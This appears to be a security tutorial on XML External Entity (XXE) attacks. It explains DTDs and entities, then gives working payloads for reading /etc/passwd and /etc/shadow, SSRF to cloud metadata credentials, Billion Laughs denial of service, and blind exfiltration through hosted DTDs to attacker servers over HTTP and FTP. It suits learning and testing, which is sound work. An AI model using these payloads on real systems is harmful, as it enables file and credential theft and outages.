XML External Entity (XXE)

XML External Entity attacks target XML parsers and can lead to information disclosure, server-side request forgery, and denial-of-service attacks.

What can you expect from an XXE vulnerability?

  • Read files from the OS
  • Perform SSRF
  • Port scan internal resources
  • In some specific instances you may be able to get remote code execution

Structure of XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT name ANY>
]>

<name>Blah</name>
  • This is the prolog: <?xml version="1.0" encoding="UTF-8"?>
  • The Document Type Definition (DTD): <!DOCTYPE name [ <!ELEMENT name ANY> ]>
  • The Document: <name>Blah</name>

Document Type Definition (DTD)

The DTD defines the structure of the XML document and the data it contains. A DTD can be defined in the XML document or loaded from an external source.

An example XML file with a DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT name (first,last)>
  <!ELEMENT first (#PCDATA)>
  <!ELEMENT last (#PCDATA)>
]>

<name>
  <first>Trevor</first>
  <last>Jones</last>
</name>
  • !DOCTYPE name - this defines the root element of the document as name
  • !ELEMENT name (first,last) - this says that the name element must contain two child elements first and last
  • !ELEMENT first (#PCDATA) - this says the first element has to be of type Parsed Character Data
  • !ELEMENT last (#PCDATA) - this says the last element has to be of type Parsed Character Data

Entities

Entities can be thought of as a simple type of variable. You would use an entity to hold a reference to some information and then include the information by using the reference in the XML document. For example, imagine I wanted to include a copyright on a number of XML documents but I want to be able to edit that information in one place. In this case it would be best to define an external entity (more on this below) with the copyright information and then include that within the DTD and the XML document.

copyright.xml
<copyright:text>© 2022 Acme, Inc.</copyright:text>
document.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
  <!ENTITY c SYSTEM "file:///copyright.xml">
]>
<copyright>&c;</copyright>

Entities can be defined and used within the DTD also:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT fullName (#PCDATA)>
  <!ENTITY first "Trevor">
  <!ENTITY full "&first; Jones">
]>

<name>
  <fullName>&full;</fullName>
</name>

The XML parser will interpolate &full; and end up with: <fullName>Trevor Jones</fullName>
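
To watch this expansion happen locally, here is a minimal sketch using Python's standard-library xml.etree.ElementTree, which expands internal entities declared in the DTD. The variable names are illustrative and the XML declaration is omitted for brevity; other parsers may behave differently.

```python
import xml.etree.ElementTree as ET

# Same document as above, minus the XML declaration.
DOCUMENT = """<!DOCTYPE name [
  <!ELEMENT fullName (#PCDATA)>
  <!ENTITY first "Trevor">
  <!ENTITY full "&first; Jones">
]>
<name>
  <fullName>&full;</fullName>
</name>"""

root = ET.fromstring(DOCUMENT)
# &full; is replaced by its value, and the nested &first; is replaced in turn.
full_name = root.find("fullName").text
print(full_name)
```

The nested reference is resolved when &full; is used in the document, not when it is declared.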

Internal Entity

An Internal Entity is an entity where its value is defined within the DTD. For example, in the following DTD, I have defined two internal entities and used them both within the XML document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE fullName [
  <!ENTITY firstName "Trevor">
  <!ENTITY lastName "Jones">
]>
<fullName>&firstName; &lastName;</fullName>

External Entity

An entity is considered external if its value is not local to the XML document. An external entity declaration places the keyword SYSTEM (or PUBLIC, followed by a public identifier) before the URI. In the following example the file entity's value is obtained from another file, so file is an external entity.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [ <!ENTITY file SYSTEM "file:///example.text"> ]>
<example>&file;</example>

External entities can also have their values loaded from remote sources. The following DTD declares an external entity named file that points to a URL.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [ <!ENTITY file SYSTEM "http://example.com/index.html"> ]>
<example>&file;</example>
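
Whether an external entity is actually fetched depends on the parser. As a hedged illustration, Python's documentation states that xml.etree.ElementTree does not expand external entities and raises a ParseError when one is referenced. The sketch below checks that behaviour for the file example above; try_parse is a hypothetical helper name, and the file is never read.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<!DOCTYPE example [ <!ENTITY file SYSTEM "file:///example.text"> ]>
<example>&file;</example>"""


def try_parse(document):
    """Return the root element's text, or a description of the parse error."""
    try:
        return ET.fromstring(document).text
    except ET.ParseError as exc:
        return f"ParseError: {exc}"


outcome = try_parse(DOCUMENT)
print(outcome)
```

A parser that does resolve external entities would instead place the contents of the referenced resource inside the example element, which is the behaviour XXE attacks rely on.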

External Entity Protocols

Protocol        libxml2  PHP  Java  .NET
file            Yes      Yes  Yes   Yes
http            Yes      Yes  Yes   Yes
ftp             Yes      Yes  Yes   Yes
https           -        -    Yes   Yes
php             -        Yes  -     -
compress.zlib   -        Yes  -     -
compress.bzip2  -        Yes  -     -
data            -        Yes  -     -
glob            -        Yes  -     -
phar            -        Yes  -     -
jar             -        -    Yes   -
netdoc          -        -    Yes   -
mailto          -        -    Yes   -
gopher*         -        -    Yes   -

*Only available in older versions of Java

PHP additional protocols

Scheme       Extension Required
https        openssl
ftps         openssl
zip          zip
ssh2.shell   ssh2
ssh2.exec    ssh2
ssh2.tunnel  ssh2
ssh2.sftp    ssh2
ssh2.scp     ssh2
rar          rar
ogg          oggvorbis
expect       expect

General Entity

General Entities are the most basic. They are defined with the syntax <!ENTITY name "value">. You reference a general entity by prefixing its name with an ampersand & and appending a semicolon ;, as in &name;.

General Entity Rules
  1. A General Entity cannot contain the definition of another entity.
  2. A General Entity must contain data that an XML parser can parse (e.g. <blah> would not be allowed because there is no closing </blah> tag.)
  3. A General Entity may be part of another entity definition but only if that entity will be used directly in the document.
Example

Here we store the long copyright string into an entity named copyright that we can refer to later in the document:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE site [
  <!ELEMENT url ANY>
  <!ENTITY copyright "&#xA9; Trevor 123 This Address Lane, Milwaukee WI. 53201">
]>

<site>
  <url>http://thissite.com</url>
  <copyright>&copyright;</copyright>
</site>

Predefined General Entities

Entity   Result  Hex     Decimal
&lt;     <       &#x3C;  &#60;
&gt;     >       &#x3E;  &#62;
&quot;   "       &#x22;  &#34;
&apos;   '       &#x27;  &#39;
&amp;    &       &#x26;  &#38;
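
When building XML by hand, these predefined entities are what keep special characters from being read as markup. A small sketch using Python's xml.sax.saxutils follows; escape() covers &, < and > by default, and the QUOTES mapping is an illustrative addition for the two quote characters.

```python
from xml.sax.saxutils import escape, unescape

# escape() handles &, < and > on its own; quotes are opt-in via a mapping.
QUOTES = {'"': "&quot;", "'": "&apos;"}
UNQUOTES = {"&quot;": '"', "&apos;": "'"}

raw = 'a < b & "c"'
escaped = escape(raw, QUOTES)
restored = unescape(escaped, UNQUOTES)

print(escaped)
print(restored)
```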

Parameter Entity

Parameter entities are defined with the syntax <!ENTITY % name "value"> and are referenced by prefixing the name with a percent sign % and appending a semicolon ;. They are a bit more flexible than General Entities. For example, the value of a parameter entity can contain the declaration of another entity:

<!ENTITY % outer "<!ENTITY inner 'Trevor'>">

Parameter entities do have limitations, though. The most important one is that they can only be defined and used within a DTD.

According to the W3C XML specification:

The use of parameter entities in the internal subset is restricted as described below. ... In the internal DTD subset, parameter-entity references MUST NOT occur within markup declarations; they may occur where markup declarations can occur. (This does not apply to references that occur in external parameter entities or to the external subset.)

Parameter Entity Rules
  1. A Parameter Entity can contain the definition of another entity.
  2. A Parameter Entity cannot be used within the document.
Example
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % parameter_entity "<!ENTITY general_entity 'Some Value'>">
  %parameter_entity;
]>
<name>&general_entity;</name>

XXE Attacks

Read System Files

We can use XXE to read system files. The external DTD below is written so that it can remain static: it references a parameter entity named file, which is defined in the payload we submit rather than in the DTD itself:

<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:5000/?x=%file;'>">
%eval;
%exfil;

The following is an example of what we submit to the server. Using this format we can then use Burp Intruder to point the file entity at a new location on each attempt.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % ext SYSTEM "http://ourserver.com/brute.dtd">
  %ext;
]>

<name></name>
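
The same substitution can be scripted. The sketch below generates one payload per candidate path from the template above; build_payloads is a hypothetical helper, and the default DTD URL is simply the one used in the example. It only builds strings and sends nothing.

```python
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % file SYSTEM "file://{path}">
  <!ENTITY % ext SYSTEM "{dtd_url}">
  %ext;
]>

<name></name>"""


def build_payloads(paths, dtd_url="http://ourserver.com/brute.dtd"):
    """Yield one payload per absolute path, pointing the file entity at it."""
    for path in paths:
        if not path.startswith("/"):
            raise ValueError(f"expected an absolute path, got {path!r}")
        yield PAYLOAD_TEMPLATE.format(path=path, dtd_url=dtd_url)


payloads = list(build_payloads(["/etc/hostname", "/etc/hosts"]))
print(payloads[1])
```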

For certain parsers we may be able to list the files in a directory. The following will work on some Java XML parsers:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/">]>

<todo>&xxe;</todo>

Port Scanning and Basic Server-Side Request Forgery (SSRF)

We can cause the system parsing the XML to perform HTTP requests against internal servers on different ports. For example the following exploit would cause the system to check if FTP is open on the IP 10.3.0.45:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://10.3.0.45:21">
]>

<doc>&xxe;</doc>

Using this approach we may be able to perform SSRF against internal targets.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>

<doc>&xxe;</doc>

Denial of Service

In this example we try to exhaust the server's memory by using entity expansion to greatly increase the payload's footprint. This attack is called the Billion Laughs attack:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY a0 "lol" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

We can see in the example that a general entity named a0 was created with the value of lol. Next, a general entity was created by interpolating a0 ten times. This is done over and over. In the real attack you would want to create as many interpolated entities as required to crash the server.
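
To get a feel for how quickly the expansion grows, the following sketch computes the expanded size for a given number of nesting levels and rebuilds the small two-level payload above. The function names are illustrative. Only the tiny payload is parsed, with Python's standard-library parser, so it is safe to run locally.

```python
import xml.etree.ElementTree as ET


def expanded_length(levels, fanout=10, seed="lol"):
    """Characters produced by the top entity after `levels` rounds of nesting."""
    return len(seed) * fanout ** levels


def build_payload(levels, fanout=10, seed="lol"):
    """Build a document with entities a0..a<levels>, each repeating the previous one."""
    lines = [f'<!ENTITY a0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        lines.append(f'<!ENTITY a{i} "{refs}">')
    dtd = "\n".join(lines)
    return f"<!DOCTYPE data [\n{dtd}\n]>\n<data>&a{levels};</data>"


# Two levels, as in the example above: 3 characters * 10 * 10.
small = ET.fromstring(build_payload(2)).text
print(len(small), expanded_length(2))

# Nine levels is never built or parsed here, only counted.
print(expanded_length(9))
```

Each extra level multiplies the output by the fanout while adding only one short line to the payload, which is why the attack is so cheap to send.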

Retrieving Exploit Data When Not Reflected

Blind XXE

Simple test to see if blind XXE may be possible:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://ourserver.com/">
]>

<todo>&xxe;</todo>

If we submit this and receive a DNS lookup or HTTP request we can assume that we may be able to extract data using a blind attack.

In the case where the results of the attack are not displayed to the user, we can still extract information. Take a look at the following DTD. It attempts to read the system file /etc/passwd and then uses that as a path parameter in a request to a URL:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY foo SYSTEM "file:///etc/passwd">
  <!ENTITY xxe SYSTEM "http://127.0.0.1:5000/&foo;">
]>

<todo>&xxe;</todo>

This type of attack will fail because it violates the General Entity Rule #3.

  3. A General Entity may be part of another entity definition but only if that entity will be used directly in the document.

In our case the foo entity is not used directly in the document so the XML parser will determine that the XML document is invalid. This is where Parameter Entities play a role. The following is the same exploit using an externally defined DTD:

<!ENTITY % hostname SYSTEM "file:///etc/hostname">
<!ENTITY % wrapper "<!ENTITY &#x25; send SYSTEM 'http://ourserver.com/?%hostname;'>">
%wrapper;
%send;

Notice that we define three entities (hostname, wrapper and send) and that both wrapper and send are used within the DTD. If we host this DTD and then include it in our attack we can start to see the power of Parameter Entities:

<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://ourserver.com/external.dtd">
  %xxe;
]>

This will work for some files, but for files that contain a carriage return we will receive an error. The section Using Character Data (CDATA) below covers how to overcome this.

Error-based XXE

If we cannot get a properly formatted XML response to show our exploit data, we may be able to cause an error that reveals what we are after. In this example we purposely cause an error during XML processing in the hope that the error appears in the response. Notice that, in the external DTD, the error entity points to a path that does not exist.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

We can use this external DTD in our exploit by referencing it:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://localhost:5000/path_error.dtd">
    %ext;
]>
<message></message>

If the application shows verbose error messages, we may be able to retrieve the contents of the file directly from the response.

Another way to cause an error is to use a protocol that is invalid. For example, in the following we leave the protocol blank:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

Using Character Data (CDATA)

In some cases the data we want to retrieve will contain characters that break XML parsing. We can use CDATA to bypass this limitation. A CDATA section tells the XML parser to treat everything between <![CDATA[ and ]]> as literal character data rather than markup. Your first instinct may be to try something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY start "<![CDATA[">
  <!ENTITY content SYSTEM "file:///some/path/some/file.txt">
  <!ENTITY end "]]>">
]>

<name>&start; &content; &end;</name>

But this will fail because it violates the General Entity Rule #2:

  2. A General Entity must contain data that an XML parser can parse (e.g. <blah> would not be allowed because there is no closing </blah> tag.)

To successfully use CDATA to retrieve data that would cause an XML parser issues we need to create four Parameter Entities:

  1. The first Parameter Entity will be the content of the file we want to read.
  2. We will then set another equal to the start of our CDATA string.
  3. The third will be set to the end of the CDATA string.
  4. And finally a fourth will contain the General Entity which will tie all of those together.
<!ENTITY % file SYSTEM "file:///some/path/some/file.txt">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % wrapper "<!ENTITY all '%start;%file;%end;'>">
%wrapper;

With that external DTD hosted, we can reference it in our exploit:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % ext SYSTEM "http://ourserver.com/cdata.dtd">
  %ext;
]>

<name>&all;</name>
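
As a local illustration of why the CDATA wrapper helps, the sketch below parses a document whose content would otherwise be rejected as malformed markup. It uses Python's standard-library parser, and the sample text is made up for the demonstration.

```python
import xml.etree.ElementTree as ET

# Without CDATA, the unclosed <first> tag and the bare & would be parse errors.
DOCUMENT = "<name><![CDATA[<first>Trevor & Jones]]></name>"

root = ET.fromstring(DOCUMENT)
# The parser hands back the CDATA contents untouched, as plain text.
literal_text = root.text
print(literal_text)
```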

XInclude Attacks

In some cases the application will not allow you to modify the DTD. You may still be able to achieve an XXE attack by using XInclude.

<example xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/hostname" />
</example>

Review the response and see if the server's hostname is included.
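
To see what an XInclude-aware processor does with this element, here is a sketch using Python's xml.etree.ElementInclude. The fake_loader function is a hypothetical stand-in that returns canned text instead of reading the file, so the example never touches the file system.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

DOCUMENT = """<example xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/hostname" />
</example>"""


def fake_loader(href, parse, encoding=None):
    """Stand-in loader: report which resource would have been read."""
    return f"[contents of {href}]"


root = ET.fromstring(DOCUMENT)
# Replace every xi:include element with whatever the loader returns for it.
ElementInclude.include(root, loader=fake_loader)
included_text = root.text.strip()
print(included_text)
```

With the default loader, the text of the referenced file would be spliced into the document at that position, with no DTD involved.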

PHP URL Wrapper

If the application is written in PHP, it may be possible to Base64-encode the content before exfiltrating it:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker_server/?%file;'>">
%ent;
%exfiltrate;
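
On the receiving side, the Base64 text arrives as the query string of the request. A minimal decoding sketch follows; decode_exfiltrated is a hypothetical helper, and it assumes the request target was logged exactly as received (for example /?cm9vdDo...).

```python
import base64
from urllib.parse import urlsplit


def decode_exfiltrated(request_target):
    """Return the bytes carried in the query string of a logged request target."""
    query = urlsplit(request_target).query
    # Restore any '=' padding that was lost along the way.
    padded = query + "=" * (-len(query) % 4)
    return base64.b64decode(padded)


# Simulated log entry built from made-up sample data.
sample = base64.b64encode(b"root:*:19000:0:99999:7:::\n").decode()
decoded = decode_exfiltrated("/?" + sample)
print(decoded.decode())
```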

FTP Protocol

You may be able to exfiltrate data using the FTP Protocol:

<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM 'ftp://attacker_server:21/?%file;'>">
%ent;
%exfiltrate;

Finding XXE Vulnerabilities

Content-Type

An application will use the Content-Type header to identify the contents of the body. If you see a Content-Type of:

  • text/xml
  • application/xml

Then the server most likely processes XML data. In some cases the current application will use JSON but will have legacy code that still processes XML. To test for this, reformat the request body as XML and change the Content-Type header accordingly.
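
Reformatting a JSON body by hand gets tedious, so here is a rough sketch that converts a flat JSON object into an equivalent XML body. The json_to_xml helper and the root_tag parameter are assumptions for illustration; the element names a real application expects have to be guessed or discovered, and nested JSON is not handled.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(body, root_tag="root"):
    """Convert a flat JSON object into an XML string, one child element per key."""
    data = json.loads(body)
    root = ET.Element(root_tag)
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")


xml_body = json_to_xml('{"description": "Buy milk", "category": "Home"}', root_tag="todo")
print(xml_body)
```

The result is sent with the Content-Type header set to application/xml or text/xml in place of the JSON one.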

I suggest that you first attempt a benign interpolation payload to validate that you can define entities using something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY foo "Does this ">
  <!ENTITY bar "expand?">
]>

<todo>
  <description>&foo; &bar;</description>
  <category>Category</category>
</todo>

If the response shows that both entities have been expanded to Does this expand?, it is likely that the application is vulnerable to XXE.

Parsing Files

If the application parses uploaded files, it may be vulnerable to XXE through the file formats it accepts. For example, svg, docx, pptx, and xlsx files all contain XML. If the server parses these documents it may be vulnerable.
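
The Office formats are ZIP archives whose members are mostly XML, so any of those members is a place where a DTD could be planted. The sketch below lists the XML parts of such a file; xml_parts is a hypothetical helper, and the archive is built in memory purely for the demonstration.

```python
import io
import zipfile


def xml_parts(file_bytes):
    """Return the names of XML members inside a ZIP-based document."""
    with zipfile.ZipFile(io.BytesIO(file_bytes)) as archive:
        return [name for name in archive.namelist() if name.endswith((".xml", ".rels"))]


# Build a tiny stand-in archive rather than relying on a real docx file.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/document.xml", "<document/>")
    archive.writestr("word/media/image1.png", b"not really a png")

parts = xml_parts(buffer.getvalue())
print(parts)
```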
